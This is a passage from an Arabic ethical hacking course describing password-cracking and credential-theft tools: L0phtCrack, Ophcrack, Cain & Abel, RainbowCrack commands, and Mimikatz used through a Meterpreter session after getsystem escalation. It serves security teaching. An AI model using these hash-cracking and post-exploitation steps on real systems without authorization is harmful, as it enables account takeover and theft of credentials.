‫ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻧﻘوم ﺑﺗﺛﺑﯾت ھذه اﻷداة ﺑﺎﺗﺑﺎع ‪ wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺛم اﻟﻧﻘر ﻓوق اﻷﯾﻘوﻧﺔ اﻟﻣﻌﺑرة ﻋﻧﮫ‬ ‫‪-‬‬
‫)‪ (L0phtCrack6‬ﻓﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫ﻓﻲ ‪ L0phtCrack 6 Wizard‬ﻧﻧﻘر ﻓوق ‪ Next‬واﻟذي ﯾﻧﻘﻠﻧﺎ اﻟﻰ اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ ﻛﻣﺎ ھو ﻣوﺿﺢ اﻣﻣﻧﺎ‪.‬‬ ‫‪-‬‬
‫ﻧﺟد اﻧﮫ ظﮭرت اﻣﻣﺎﻧﺎ ﻗﺎﺋﻣﮫ ﺑﮭﺎ اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات واﻟذي ﯾرﯾد ﻣﻧك ﺗوﺿﯾﺢ اﻟﻣﻛﺎن اﻟذي ﺳوف ﯾﺄﺧذ ﻣن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور‬ ‫‪-‬‬
‫وھﻧﺎ ﺳوف ﻧﺧﺗﺎر ‪ Retrieve from the local machine‬ﺛم ﻧﻧﻘر ﻓوق‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪354‬‬

‫ﻧﻧﺗﻘل اﻻن اﻟﻰ اﻟﺧطوة اﻟﺛﺎﻟﺛﺔ‪ ،‬واﻟﺗﻲ ﺗﺄﺗﻰ ھﻲ اﻷﺧرى ﺑﺎﻟﻌدﯾد ﻣن ﺧﯾﺎرات اﻟﺗدﻗﯾﻖ )‪ (auditing method‬واﻟﺗﻲ ﺗرﯾد ﻣﻧك‬ ‫‪-‬‬
‫اﺧﺗﯾﺎر أي ﻣن ﻧظﺎم اﻟﺗدﻗﯾﻖ اﻟﺗﻲ ﺗرﯾد اﺳﺗﺧداﻣﮫ وھذا ﯾﻌﺗﻣد ﻋﻠﻰ ﻗوة اﻟﮭﺎش‪ .‬ھﻧﺎ ﺳوف ﻧﺧﺗﺎر اﻗواھم وھو ‪Strong Password‬‬
‫‪ Audit‬ﺛم ﻧﻧﻘر ﻓوق ‪ Next‬ﻟﻠﺗﻧﻘل اﻟﻰ اﻟﻣرﺣﻠﺔ اﻟراﺑﻌﺔ‪.‬‬

‫ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ذات اﻟﻌﻧوان ‪ Pick reporting Style‬واﻟﺗﻲ ﻓﯾﮭﺎ ﺗﺣدﯾد ﻧوﻋﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺳوف ﺗﻌرض ﻓﻲ اﻟﺗﻘرﯾر‪.‬‬ ‫‪-‬‬
‫اﻓﺗراﺿﯾﺎ ﯾوﺟد ﻋﻼﻣﺔ ﻋﻠﻰ اﻟﺟﻣﯾﻊ ﻣﺎ ﻋدا واﺣدا وھﯾﺎ ’‪ Display encrypted password ’hash‬ﺣﯾث ﺳوف ﻧﺧﺗﺎرھﺎ ھﻲ‬
‫اﻷﺧرى ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق ‪ next‬ﻟﻼﻧﺗﻘﺎل اﻟﻰ اﻟﻣرﺣﻠﺔ اﻟﺗﺎﻟﯾﺔ واﻷﺧﯾرة ﻣن ﻋﻣﻠﯾﺔ ‪.wizard‬‬
‫ﻓﻲ اﻟﻣرﺣﻠﺔ اﻷﺧﯾرة ﯾﻘوم ﺑﻌرض ﺳرﯾﻊ ﻻﺧﺗﯾﺎرات ﻓﻲ ﺟﻣﯾﻊ اﻟﻣراﺣل اﻟﺳﺎﺑﻘﺔ وﯾﺧﺑرك اﻧﮫ ﻋﻠﻰ اﺳﺗﻌداد ﻟﻠﻘﯾﺎم ﺑﺎﻟﻌﻣﻠﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﻧﻧﻘر ھﻧﺎ ﻓوق ‪.FINISH‬‬ ‫‪-‬‬
‫ﺑﻌد اﻻﻧﺗﮭﺎء ﯾظﮭر ﻟك رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﺎﻧﮫ أﻧﮭﻲ اﻟﻌﻣﻠﯾﺔ )‪ (Audit completed‬ﻧﻧﻘر ﻓوق ‪.OK‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪355‬‬

‫ﻓﻲ ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻌﻠوﯾﺔ ﻧﻧﻘر ﻓوق اﻷداة ‪.session options‬‬ ‫‪-‬‬

‫ﺑﻌد اﻟﻧﻘر ﻓوق ‪ Session Options‬ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ وﻧﺧﺗﺎر ﻣﻧﮭﺎ ﺗﻔﻌﯾل اﻻﺗﻲ‪:‬‬ ‫‪-‬‬
‫‪ Crack NTLM Passwords‬ﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان ‪.Dictionary crack‬‬
‫‪ Crack NTLM Passwords‬ﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان ‪.Dictionary/Brute Hybrid crack‬‬
‫‪ Crack NTLM Passwords‬ﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان ‪.Brute force crack‬‬
‫‪Enable Brute Force Minimum Character Count‬‬
‫‪Enable Brute Force Maximum Character Count‬‬
‫ﺛم ﻧﻧﻘر ﻓوق ‪.OK‬‬ ‫‪-‬‬

‫ﺑﺗﺣﻠﯾل اﻟﮭﺎش وإﻋطﺎﺋك ﺗﻘرﯾر‬ ‫ﺛم ﺑﻌد اﻟﻧﻘر ﻓوق ‪ OK‬ﻧرﺟﻊ اﻟﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ وﻧﻧﻘر ﻓﻘوق اﻟﻌﻼﻣﺔ ‪ BEGIN‬ﻟﯾﺑدأ‬ ‫‪-‬‬
‫ﻋن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪356‬‬

‫‪Ophcrack‬‬
‫اﻟﻣﺻدر‪http://ophcrack.sourceforge.net :‬‬

‫‪ Ophcrack‬ھو أداة ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر وﯾﻧدوز وﯾﺳﺗﺧدم ﺟداول ‪ rainbow tables‬ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﻷﻧﮫ ﯾﺄﺗﻲ ﻣﻊ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم‬
‫اﻟرﺳوﻣﯾﺔ وﯾﻌﻣل ﻋﻠﻰ أﻧظﻣﺔ ﺗﺷﻐﯾل ﻣﺧﺗﻠﻔﺔ ﻣﺛل وﯾﻧدوز‪ ،‬ﻟﯾﻧوﻛس ‪ /‬ﯾوﻧﯾﻛس‪ ،‬اﻟﺦ‪.‬‬
‫ﯾوﻓر ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻧﺳﺧﺔ ﺳطر اﻷواﻣر ‪ CLI‬وﻧﺳﺧﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ‪ GUI‬ﻣن ﺗطﺑﯾﻖ ‪.Ophcrack‬‬

‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬ﻛﺳر ھﺎﺷﺎت ﻣن اﻟﻧوع ‪LM‬و‪.NTLM‬‬
‫‪ -‬ﯾﺳﺗﺧدم ‪ Brute-force module‬ﻟﻛﺳر اﻟﻛﻠﻣﺎت اﻟﺑﺳﯾطﺔ‬
‫‪ -‬ﯾﺳﺗﺧدم رﺳوم ﺑﯾﺎﻧﯾﺔ ﻟﺗﺣﻠﯾل ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬ﺗﻔرﯾﻎ وﺗﺣﻣﯾل اﻟﮭش ﻣن اﻟﻣﻠف ‪ SAM‬ﻣن ﻗﺳم اﻟوﯾﻧدوز‪.‬‬
‫‪ o‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻧﻘوم ﺑﺗﺛﺑﯾت ھذه اﻷداة ﺑﺎﺗﺑﺎع ‪ wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺛم اﻟﻧﻘر ﻓوق اﻷﯾﻘوﻧﺔ اﻟﻣﻌﺑرة ﻋﻧﮫ‬
‫)‪ (Ophcrack‬ﻓﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ او ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن رﯾﻖ اﺗﺑﺎع اﻟﻣﺳﺎر اﻟﺗﺎﻟﻲ ﻓﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ‬
‫ﻣﺛﯾﻠﮫ ﻟﺷﺎﺷﮫ اﻟﺗﺎﻟﯾﺔ‪.‬‬
‫‪Password Attacks | Offline Attacks | Ophcrack‬‬

‫‪ o‬ﻧﻼﺣظ ﻣن ﺷرﯾط اﻷدوات اﻟﻌﻠوي وﺟود اﻟزر ‪ load‬ﺑﻌض اﻟﻧﻘر ﻋﻠﯾﮫ ﺗظﮭر ﻗﺎﺋﻣﮫ ﺗﺣدد اﻟﻣﻛﺎن اﻟذي ﺳوف ﯾﺄﺧذ ﻣن اﻟﺗطﺑﯾﻖ ﺑﯾﺎﻧﺎت‬
‫‪ .SAM‬ﻧﺟد ﻣن ھذه اﻟﺧﯾﺎرات ‪ PWDUMP file‬وھذا ﺳوف ﯾﺄﺧذ ﻣن ﻧﺎﺗﺞ إﺧراج اﻷداة ‪ pwdump‬اﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪357‬‬

‫‪ o‬ﺑﻌد ﺗﺣﻣﯾل ﻣﻠف اﻟﮭﺎش ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫‪ o‬ﻓﻲ ﺷرﯾط اﻷدوات اﻟﻌﻠوي ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Tables‬واﻟﺗﻲ ﯾؤدى اﻟﻰ ظﮭور اﻟﻘﺎﺋﻣﺔ اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫‪ o‬ﺣﯾث ﻣن ﺧﻼل ھذه اﻟﻘﺎﺋﻣﺔ ﯾﻣﻛن ﺗﺣﻣﯾل ‪ Rainbow table‬ﺛم ﺑﻌد ﺗﺣﻣﯾﻠﮫ ﻧرﺟﻊ اﻟﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ وﻧﻧﻘر ﻓوق اﻟزر ‪Crack‬‬
‫ﻟﯾﺑدأ ﻋﻣﻠﯾﺔ ﻛﺳر اﻟﮭﺎش وﺗﺣﻠﯾل ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪358‬‬

‫‪Cain & Abel‬‬


‫اﻟﻣﺻدر‪http://www.oxid.it :‬‬

‫‪ Cain & Abel‬ھﻲ أداة ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺎﯾﻛروﺳوﻓت‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﻻﺳﺗﻌﺎدة أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﻛﻠﻣﺎت‬
‫اﻟﺳر ﻣن ﺧﻼل اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺔ )‪ ،(sniffing network‬وﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة ﺑﺎﺳﺗﺧدام ھﺟﻣﺎت اﻟﻘﺎﻣوس‪،brute-force ،‬‬
‫ھﺟﻣﺎت ﺗﺣﻠﯾل اﻟﺷﻔرات‪ ،‬ﺗﺳﺟﯾل ﻣﺣﺎدﺛﺎت‪ ، VolP‬ﻓك ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﻠوطﺔ )‪ ،(decoding scrambled passwords‬واﺳﺗﻌﺎدة ﻣﻔﺎﺗﯾﺢ‬
‫اﻟﺷﺑﻛﺔ ﻻﺳﻠﻛﯾﺔ‪ ،revealing password boxes ،‬ﻛﺷف ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ ﻣؤﻗﺗﺎ‪ ،‬وﺗﺣﻠﯾل ﺑروﺗوﻛوﻻت اﻟراوﺗر‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه‬
‫اﻷداة‪ ،‬ﻓﺎن ﻛﻠﻣﺎت اﻟﺳر وﺑﯾﺎﻧﺎت اﻻﻋﺗﻣﺎد ﻣن ﻣﺻﺎدر ﻣﺧﺗﻠﻔﺔ ﯾﻣﻛن اﺳﺗردادھﺎ ﺑﺳﮭوﻟﺔ‪.‬‬

‫ھذه اﻷداة ﺗﺗﻛون ﻣن ‪ (Arp Poison Routing) APR‬اﻟﺗﻲ ﺗﻣﻛﻧك ﻣن اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ وھﺟﻣﺎت رﺟل ﻓﻲ اﻟﻣﻧﺗﺻف‪.‬‬
‫‪ Sniffing‬ﻓﻲ ھذه اﻷداة ھﻲ أﯾﺿﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺣﻠﯾل اﻟﺑروﺗوﻛوﻻت اﻟﻣﺷﻔرة ﻣﺛل ‪ HTTP‬و ‪ ،SSH-1‬وﯾﺣﺗوي ﻋﻠﻰ ﻣرﺷﺣﺎت ﻻﻟﺗﻘﺎط‬
‫‪ credentials‬ﻣن ﻣﺟﻣوﻋﺔ واﺳﻌﺔ ﻣن آﻟﯾﺎت اﻟﺗوﺛﯾﻖ‪.‬‬

‫‪Rainbowcrack‬‬
‫اﻟﻣﺻدر‪http://www.project-rainbowcrack.com :‬‬

‫‪ RainbowCrack‬ھو ﺗطﺑﯾﻖ ﯾﺳﺗﺧدم ﻟﻛﺳر اﻟﮭﺎش ﻋن طرﯾﻖ اﺳﺗﺧدام ﺟداول ‪ .Rainbow table‬ﺣﯾث إﻧﮫ ﯾﺳﺗﺧدم ﺧوارزﻣﯾﺔ‬
‫‪ time-memory tradeoff‬ﻟﻛﺳر اﻟﮭﺎش‪ .‬ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ ذﻟك ﻓﺎﻧﮫ ﯾﺳﺗﺧدم ‪ brute force cracker‬ﻟﻛﺳر اﻟﮭﺎش واﻟﺗﻲ ﺗﺧﺗﻠف ﻋﻧد‬
‫ﻣﻘﺎرﻧﺗﮫ ﻣﻊ ‪ .time-memory tradeoff hash cracker‬ﺣﯾث أن ‪ brute force cracker‬ﻟﻛﺳر اﻟﮭﺎش ﺳوف ﺗﺣﺎول اﺳﺗﺧدام ﻛل‬
‫‪ plaintexts‬ﻣﻣﻛﻧﺔ واﺣدا ﺗﻠو اﻵﺧر ﺧﻼل ﻋﻣﻠﯾﺔ اﻟﻛﺳر‪ ،‬ﻓﻲ ﺣﯾن ان ‪ RainbowCrack‬ﯾﺣﺳب ﺟﻣﯾﻊ أزواج ‪plaintext-ciphertext‬‬
‫اﻟﻣﻣﻛﻧﺔ ﻓﻲ وﻗت ﻣﺑﻛر وﺗﺧزﯾﻧﮭﺎ ﻓﻲ اﻟﻣﻠف ‪ .rainbow table‬ﻗد ﯾﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ ﻗﺑل ﺣﺳﺎب اﻟﺟداول‪ ،‬وﻟﻛن ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻣرﺣﻠﺔ‬
‫اﻟﺣﺳﺎب‪ ،‬ﺳوف ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﻛﺳر اﻟﺷﻔرات اﻟﻧص اﻟﻣﺷﻔر ﻓﻲ ﺟداول ‪ Rainbow table‬ﺑﺳﮭوﻟﺔ وﺑﺳرﻋﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪359‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھذه اﻷداة ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ وﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ اﻟﺳطر ]‪ [rcrack *.rt -f crackme‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫ﺣﯾث ﯾﻣﺛل ]‪ Rainbow table [*.rt‬وﯾﻣﺛل اﻟﻣﻠف ‪ crackme‬اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش‪ .‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾﻣﻛن اﯾﺿﺎ‬
‫اﺳﺗﺧدام ‪ rainbow crack‬أﯾﺿﺎ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻟﺳر ]‪ [rcracki_mt -h hash rainbow_table_pathname‬واﻟﺗﻲ ﺗﻌد ﻧﺳﺧﮫ‬
‫ﻣﺣدﺛﮫ ﻣن اﻟﺳﺎﺑﻘﺔ‪.‬‬
‫‪#rcracki_mt -h hash rainbow_table_pathname‬‬
‫‪#rcracki_mt -l hash_list_file rainbow_table_pathname‬‬
‫‪#rcracki_mt -f pwdump_file rainbow_table_pathname‬‬
‫‪#rcracki_mt -c lst_file rainbow_table_pathname‬‬
‫أﯾﺿﺎ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾوﺟد ﺑﻌض اﻷدوات اﻷﺧرى اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﺳﺗﺧدام ‪ rainbow table‬واﻟﻣوﺟودة ﻓﻲ اﻟﻣﺳﺎر‬
‫‪./usr/share/rainbowcrack/‬‬
‫ﻣﺛل ‪ rtgn‬اﻟذي ﯾﺳﺗﺧدم ﻹﻧﺷﺎء ‪rainbow table‬‬

‫‪ Rcrack‬اﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﺳﺎﺑﻘﺎ وﺑﻌض اﻷدوات اﻷﺧرى اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣل ﻋﻠﻰ ‪.rainbow table‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪360‬‬

‫‪Mimikatz Tool to Recover Plain Text Passwords‬‬

‫ﻣﻘﺪﻣﮫ‬
‫ﻓﻲ ھذا اﻟﺟزء ﺳوف ﻧﺗﻧﺎول اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻋن ﺑﻌد ﻓﻲ ﻧص ﻋﺎدي‪ .‬أﻧﺎ ﻟن أدﻋﻲ أﻧﻧﻲ أﻓﮭم ﺑﺎﻟﺿﺑط ﻛﯾف ﯾﻔﻌل ﻣﺎ ﯾﻔﻌﻠﮫ‪ ،‬وﻟﻛن ﻣﺑرﻣﺟﻲ‬
‫ھذا اﻟﺗطﺑﯾﻖ ﻗد وﺟدوا ان ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدى ﻏﯾر ﻣﺷﻔر ﻓﻲ ﻋدة ﻣواﻗﻊ ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﻘﺎﺋﻣﺔ‬
‫ﻋﻠﻰ اﻟوﯾﻧدوز )‪ .(windows process‬ﻟﻘد أﺻﺑﺢ ‪Mimikatz‬ﺑرﻧﺎﻣﺞ ﻣﺳﺗﻘل اﻵن ﯾﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪ ،‬وﺗﻣت إﺿﺎﻓﺔ اﻟﻰ‬
‫إطﺎر ‪ Metasploit‬ﺑوﺻﻔﮭﺎ وﺣدة ‪ ،Meterpreter‬ﻣﻣﺎ ﯾﺟﻌل اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﺳﮭﻠﮫ ﺑﻣﺟرد أن ﯾﻛون ﻟدﯾك ﺟﻠﺳﺔ ﻋﻣل ﺑﻌﯾدة‪.‬‬
‫‪ Mimikatz‬ھو أداة ‪ post-exploitation‬ﻋظﯾﻣﮫ اﻟﺗﻲ ﻛﺗﺑﮭﺎ ﺑﻧﯾﺎﻣﯾن دﯾﻠﺑﻲ )‪ .(Benjamin Delpy‬ھﻧﺎك اﻟﻛﺛﯾر ﻣن اﻷوﻗﺎت ﺑﻌد ﻗﯾﺎم‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﺑﻣرﺣﻠﺔ ‪ exploitation‬أوﻟﯾﺔ ﻧﺎﺟﺣﺔ وﻟﻛﻧﮭم ﻗد ﯾرﻏﺑوا ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻣوطﺊ ﻗدم أﻛﺛر ﺛﺑﺎﺗﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪/‬اﻟﺷﺑﻛﺔ‪ .‬وﻏﺎﻟﺑﺎ ﻣﺎ‬
‫ﯾﺗطﻠب ذﻟك ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻛﻣﯾﻠﯾﺔ‪ Mimikatz .‬ھﻲ ﻣﺣﺎوﻟﺔ ﻟرﺑطﮭﺎ ﻣﻊ ﺑﻌض اﻟﻣﮭﺎم اﻷﻛﺛر ﻓﺎﺋدة واﻟﺗﻲ ﺳوف ﯾرﻏب اﻟﻣﮭﺎﺟﻣﯾن‬
‫ﻓﻲ اﻟﻘﯾﺎم ﺑﮭﺎ‪.‬‬
‫ھذه اﻷداة ﺗم اﻧﺷﺎﺋﮭﺎ ﻋﺎم ‪ 2007‬ﻟﺗﺗﻔﺎﻋل ﻣﻊ ﻣﻛوﻧﺎت أﻣن وﯾﻧدوز؛ ﻹﺛﺑﺎت ﺑﻌض ﻣﻔﺎھﯾم اﻷﻣن؛ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺗﺑﻊ ﺗطور ‪.Microsoft‬‬
‫‪Mimikatz‬ھﻲ أداة ﻓﻲ اﻷﺳﺎس ﺗم ﺻﻧﻌﮭﺎ ﻟﺗﻌﻠم ‪C‬وزﯾﺎدة اﻟﻛﺛﯾر ﻣن اﻟﺗﺟﺎرب ﻣﻊ أﻣﺎن‪ . Windows‬وﺗﺳﺗﺧدم اﻵن اﻟﻣﻌروف ﺟﯾدا‬
‫ﻻﺳﺗﺧراج ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ ھﯾﺋﺔ ﻏﯾر ﻣﺷﻔره ‪ ،plaintexts‬اﻟﮭﺎش‪ ،‬رﻣز ‪ PIN‬وﺗذاﻛر ‪ Kerberos‬ﻣن اﻟذاﻛرة‪ Mimikatz .‬ﯾﻣﻛﻧﮭﺎ ان‬
‫ﺗؤدى أﯾﺿﺎ ‪ pass-the-ticket ،pass-the-hash‬أو ‪ ,build Golden tickets‬ﺗﺗﻼﻋب ﻣﻊ ‪ certificate‬أو اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎﺻﺔ‬
‫)‪ ... ، vault ،(private key‬رﺑﻣﺎ ﺗﺻﻧﻊ اﻟﻘﮭوة؟‬

‫ﻟﺣﺳن اﻟﺣظ‪ ،‬ﻗررت ‪ Metasploit‬إﺿﺎﻓﺔ ‪ Mimikatz‬ﻛﺑرﻧﺎﻣﺞ ﻧﺻﻲ ‪ meterpreter‬ﻟﻠﺳﻣﺎح ﻟﻠوﺻول إﻟﻰ ﻣﺟﻣوﻋﺔ ﻛﺎﻣﻠﺔ ﻣن اﻟﻣﯾزات‬
‫ﻣن دون اﻟﺣﺎﺟﺔ إﻟﻰ ﺗﺣﻣﯾل أي ﻣن اﻟﻣﻠﻔﺎت إﻟﻰ اﻟﻘرص اﻟﻣﺿﯾف اﻟﮭدف‪.‬‬
‫ﻣﻼﺣظﺔ‪ :‬إﺻدار ‪ Mimikatz‬ﻓﻲ ‪ metasploit‬ھو ‪ ،v1.0‬وﻣﻊ ذﻟك أﺻدر ﺑﻧﯾﺎﻣﯾن دﯾﻠﺑﻲ ﺑﺎﻟﻔﻌل ‪ v2.0‬ﻛﺣزﻣﺔ واﺣدة ﻗﺎﺋﻣﺔ ﺑذاﺗﮭﺎ‬
‫ﻋﻠﻰ ﻣوﻗﻌﮫ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬ﺣﯾث ان اﻟﻛﺛﯾر ﻣن ﺟﻣل اﻟﺑﻧﺎء ﻗد ﺗﻐﯾرت ﻣﻊ اﻟﺗرﻗﯾﺔ إﻟﻰ ‪ .v2.0‬وﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﺧﻼل اﻟﻣواﻗﻊ‬
‫اﻟﺗﺎﻟﻲ ﺳواء ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز او ﻟﯾﻧﻛس‬
‫‪http://blog.gentilkiwi.com/mimikatz‬‬ ‫‪or directly‬‬
‫‪https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140505‬‬
‫ﺗم إﺿﺎﻓﺔ اﻻﺻدار اﻟﺛﺎﻧﻲ ﻟل ‪ meterpreter‬ﻣن ﻗﺑل ‪ rapid7‬ﻟذﻟك ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﺗﺣدﯾث ‪ metasploit‬او ﯾﻣﻛن ﺗﺣﻣﯾل اﻹﺻدار‬
‫اﻟﺛﺎﻧﻲ اﻟﻣﺧﺻص ﻟل ‪ metasploit‬ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪https://github.com/rapid7/meterpreter/tree/master/source/extensions/kiwi‬‬
‫‪https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/kiwi‬‬
‫‪Loading Mimikatz‬‬

‫ﺑﻌد ‪ exploit‬ﻧﺎﺟﺢ واﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ meterpreter‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻠﺗﺄﻛد ﻣن أن اﻟﺟﻠﺳﺔ )‪(session‬اﻟﺗﻲ ﻧﻌﻣل ﺑﮭﺎ ﺗﻌﻣل ﻣﻊ اﻣﺗﯾﺎزات‬
‫ﻣﺳﺗوى اﻟﻧظﺎم )‪ (System privilege‬ﻟﻛﻲ ﺗﻌﻣل ‪ Mimikatz‬ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬

‫اﻣﺎ إذا ﻛﻧت ﻻ ﺗﻌﻣل ﺑﺎﻣﺗﯾﺎزات ‪ system‬ﻓﯾﻣﻛن اﻟﺗﻧﻘل اﻟﻰ اﻣﺗﯾﺎزات ‪ system‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪ getsystem‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ Mimikatz‬ﯾدﻋم اﺑﻧﯾﺔ اﻟوﯾﻧدوز ‪ bit32‬و ‪ .bit64‬ﺑﻌد اﻟﺗرﻗﯾﺔ اﻟﻰ اﻣﺗﯾﺎزات ‪ SYSTEM‬ﻟﻧظﺎم ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﻟﺗﺣﻘﻖ ﻣن ﺑﻧﯾﺔ اﻟﻧظﺎم‪،‬‬
‫ﻣﻊ اﻻﻣر "‪ ."sysinfo‬إذا ﻛﺎﻧت ﺑﻧﯾﺔ اﻟﺟﺎھز ‪ bit64‬ﺛم ﻗﻣت ﺑﺗﺣﻣﯾل ‪ Mimikatz‬ذات اﻟﺑﻧﯾﺔ ‪ bit32‬ﻓﮭذا ﻗد ﯾؤﺛر ﺳﻠﺑﺎ واﻟﺗﻲ ﺳوف ﺗﺳﺑب‬
